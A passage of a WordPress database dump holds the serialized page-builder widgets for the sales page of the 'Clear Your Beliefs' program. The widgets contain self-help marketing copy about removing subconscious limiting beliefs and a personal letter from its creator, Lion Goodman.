]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1581, 2027, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60620:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n \n\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n \n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n \n\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n \n\n&nbsp;\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The 